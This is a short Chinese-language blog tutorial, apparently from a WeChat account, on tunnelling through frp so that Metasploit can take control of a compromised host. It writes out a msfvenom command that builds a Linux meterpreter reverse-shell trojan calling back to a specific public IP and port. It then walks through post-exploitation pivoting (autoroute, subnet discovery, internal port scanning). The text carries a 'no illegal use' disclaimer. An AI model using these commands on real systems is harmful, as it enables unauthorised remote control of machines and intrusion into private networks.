声明: 严禁用作非法目的,谢绝一切形式的转载。
在这里对介绍了如何通过frp进行内网穿透。本篇 文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。
网络拓扑
通过家庭kali主机,获取到肉鸡的meterpreter。
frp配置
frps
frp服务器端配置文件frps.ini如下:
使用了dashboard。通过dashboard可以查看frp服务器的状态。
运行frps
./frps -c frps.ini
frpc
frp客户端配置文件frpc.ini如下:
运行frpc
./frpc -c frpc.ini
MSF
生成木马
通过如下命令生成木马,注意这里的LHOST是公网的ip,LPORT是上面frpc.ini的remote_port。这是最重要的地方。
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=47.92.90.25 LPORT=7002 -i 3 -f elf -o test_7002
获取meterpreter
注意这里的lhost是localip即127.0.0.1、lport是localport即5555。这里是端口进行了转发。
获取路由信息
run get_local_subnets
自动添加路由
run post/multi/manage/autoroute
查看路由信息
run autoroute -p
注意这里的网关是session 1。
扫描开放的端口
使用auxiliary/scanner/portscan/tcp模块进行端口扫描。
这些扫描大多数的噢没有nmap强大,但是nmap在这里不能直接使用,需要设置socks代理,后续文章会详细介绍如何通过nmap进行扫描。
数据流
在"肉鸡"出查看7002端口的数据流。
在Kali中查看ip=47.92.90.25的数据流。
公众号
更多内容,欢迎关注我的微信公众号:无情剑客。
网友评论